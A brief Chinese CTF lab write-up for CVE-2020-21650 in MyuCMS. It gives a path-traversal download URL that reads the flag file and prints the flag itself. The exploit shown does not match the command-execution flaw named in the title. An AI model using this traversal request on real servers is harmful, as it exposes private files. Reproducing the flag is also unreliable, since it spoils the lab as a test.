春秋云镜 :CVE-2020-21650(MyuCMS后台rce)

一、题目

春秋云镜 :CVE-2020-21650(MyuCMS后台rce)_第1张图片

 靶标介绍:

MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.

进入题目:

春秋云镜 :CVE-2020-21650(MyuCMS后台rce)_第2张图片

 exp:

url/index.php/bbs/index/download?url=../../../../../flag&local=1&name

春秋云镜 :CVE-2020-21650(MyuCMS后台rce)_第3张图片

查看flag:

春秋云镜 :CVE-2020-21650(MyuCMS后台rce)_第4张图片

 flag{2d3ea261-8b0c-488b-b15d-5fceba2fa1b6}

你可能感兴趣的:(i春秋,安全,web安全,网络安全)